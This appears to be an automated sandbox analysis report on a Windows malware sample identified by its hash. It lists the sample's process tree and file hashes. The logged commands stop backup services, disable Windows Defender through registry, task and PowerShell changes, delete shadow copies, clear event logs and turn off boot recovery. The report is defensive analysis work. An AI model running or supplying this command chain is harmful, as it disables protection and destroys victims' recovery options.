edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe reg.exe PID 2476 wrote to memory of 3296 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe reg.exe PID 2476 wrote to memory of 3296 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe reg.exe PID 2476 wrote to memory of 3536 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe reg.exe PID 2476 wrote to memory of 3536 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe reg.exe PID 2476 wrote to memory of 3264 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe reg.exe PID 2476 wrote to memory of 3264 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe reg.exe PID 2476 wrote to memory of 1028 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe reg.exe PID 2476 wrote to memory of 1028 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe"C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:3716
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3736 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:3668
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:660
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:928 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:2356
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:3748
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:2292
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:3392
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1044
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_12c95" /y2⤵
- Suspicious use of WriteProcessMemory
PID:612 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_12c95" /y3⤵PID:932
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:2648
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:2576
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1180
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:2672
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:3688
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1528
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1716
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1988
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_12c95" start= disabled2⤵PID:3960
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2316
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3296
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:3536
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:3264
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1028
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:740
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:3616
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:3256
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:2216
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:3872
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1908
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:3500
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:3916
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:924
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:960
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:632
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:436
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:2288
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:3972
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:2220
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:2024
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:728
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1568
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:920
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3312 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1360 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1712 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4068
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3308
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2528
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3000
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:2272 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:380
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:376 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3236 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1444 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2824 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3716 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3220 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3120 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:3048 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2900
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:3260 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1160
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:980 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:4092
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3188
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5
1eff030d649b7120d7e5fa8fb2be0154
SHA1e96442fd73dcb64d6194155f2165fd61b3c482fa
SHA256eb55bfcfa829939b1647fc9753e628aff2d6a2e6a6fa88a9dafbe5a8489a9a3d
SHA512a5141f2570a58e2b86176b02ec03718c9452d095da52f930c3c48648c76b117465b290539054aa75667f33e746b91f37730aa387e2a9c41a10589ff66edb444a